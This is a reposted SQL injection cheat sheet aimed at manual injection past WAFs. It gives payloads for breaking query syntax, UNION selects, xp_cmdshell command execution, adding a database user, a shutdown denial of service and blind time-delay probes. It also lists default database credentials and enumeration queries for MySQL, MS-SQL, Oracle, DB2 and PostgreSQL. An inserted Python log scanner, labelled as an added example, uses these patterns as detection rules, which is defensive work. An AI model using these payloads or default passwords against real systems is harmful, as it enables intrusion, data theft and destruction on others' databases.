• Common SQL Injection Detection Statements (Repost)


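    0x00 Preface

         Many WAFs can now block the requests sent by injection tools such as sqlmap and havij, so in those cases we need to use HackBar in the browser to inject manually, or, put another way, perform the injection with manual bypasses.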

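    0x01 Discovering SQL injection

    1 Breaking query syntax: single quote ( ' ), double quote ( " )

    2 SQL comment injection: double hyphen ( -- ), hash ( # ), comment ( /* )

    3 Extending/appending queries: semicolon ( ; )

    4 Injecting past/bypassing filters: use CHAR(), ASCII(), HEX(), CONCAT(), CAST(), CONVERT(), NULL to convert the injection characters above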

    0x02 Common SQL injection commands

    1 Union injection: Union all select NULL (Multiple columns)

    2 Command execution: 1;exec master..xp_cmdshell 'dir'>C:\inetpub\wwwroot\dir.txt' OR master.dbo.xp_cmdshell

    3 Loading files: LOAD_FILE(), User UTL_FILE and utfReadfileAsTable

    4 Adding a user: 1'; insert into users values('nto','nto123')

    5 DoS attack: 1';shutdown --

    6 Getting columns: select name from syscolumns where id =(select id FROM sysobjects where name = 'target table name') -- (Union can help)Co

    0x02 Common blind SQL injection commands

    1 Quick check: AND 1=1, AND 1=0

    2 Querying the user: 1+AND+USER_NAME()='dbo'

    3 Time-delay injection: 1;waitfor+delay+'0:0:10'

    4 Checking for the SA user: SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115

    5 Jump/sleep: BENCHMARK(TIMES, TASK), pg_sleep(10)
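
    The probe patterns listed under 0x01 and in the blind-injection list above, turned into a check over web access logs. This is an added example, not part of the reposted article; the rule names, regular expressions, the /item endpoint and the log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names follow the article's categories; the regexes are assumptions of this example.
RULES = [
    ("syntax-break",  re.compile(r"['\"]")),
    ("comment",       re.compile(r"--|#|/\*")),
    ("stacked-query", re.compile(r";")),
    ("encoding-func", re.compile(r"\b(?:char|ascii|hex|concat|cast|convert)\s*\(", re.I)),
    ("union-select",  re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("time-delay",    re.compile(r"\bwaitfor\s+delay\b|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(value, rounds=3):
    """URL-decode up to `rounds` times so double-encoded input (%2527) is unmasked."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(query_string):
    """Return the names of all rules that match the decoded query string."""
    text = normalise(query_string)
    return [name for name, rx in RULES if rx.search(text)]

def scan(lines):
    """Map 1-based line number -> matched rule names for lines carrying a query string."""
    hits = {}
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if m and "?" in m.group(1):
            tags = classify(m.group(1).split("?", 1)[1])
            if tags:
                hits[n] = tags
    return hits

# Constructed access-log lines (documentation IP range, hypothetical /item endpoint).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=12 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=12%27 HTTP/1.1" 500 90',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=12+AND+1=0 HTTP/1.1" 200 40',
    '203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1;waitfor+delay+%270:0:10%27 HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1%2520union%2520all%2520select%2520NULL HTTP/1.1" 200 512',
]
print(scan(SAMPLE_LOG))
```

    Rules such as the bare quote, semicolon and hash match plenty of benign traffic, so the tags are best used to rank requests for review alongside response codes and timing rather than to block on their own.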

    0x03 Default database usernames

    Oracle                  scott/tiger, dbsnmp/dbsnmp
    MySQL                  mysql/<BLANK>, root/<BLANK>
    PostgreSQL        postgres/<BLANK>
    MS-SQL               sa/<BLANK>
    DB2                     db2admin/db2admin

    0x04 Common SQL injection commands for back-end databases

    1 MySQL

    Grab                              @@version
    Users                            * from mysql.user
    Tables                         table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
    Database                    distinct(db) FROM mysql.db
    Columns                    table_schema, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_name = '<TABLENAME>'
    Running User               user()

    2 MS-SQL
    Grab version           @@version
    Users                      name FROM master..syslogins
    Tables                     name FROM master..sysobjects WHERE xtype = 'U'
    Database                name FROM master..sysdatabases;
    Columns                name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = '<TABLENAME>')
    Running User        DB_NAME()

    3 Oracle
    Grab version           table v$version compare with 'Oracle%'
    Users                      * from dba_users
    Tables                      table_name from all_tables
    Database                distinct owner from all_tables
    Columns                 column_name from all_tab_columns where table_name='<TABLENAME>'
    Running User        user from dual

    4 IBM DB2
    Grab version          Versionnumber from sysibm.sysversions;
    Users                      user from sysibm.sysdummy1
    Tables                    name from sysibm.systables
    Database               schemaname from syscat.schemata
    Columns                name, tbname, coltype from sysibm.syscolumns
    Running User        user from sysibm.sysdummy1

    5 PostgreSQL
    Grab version           version()
    Users                     * from pg_user
    Database                datname FROM pg_database
    Running User         user;

    Link: https://blog.csdn.net/qq_29277155/article/details/51248089

  • Original address: https://www.cnblogs.com/linxiu-0925/p/9071786.html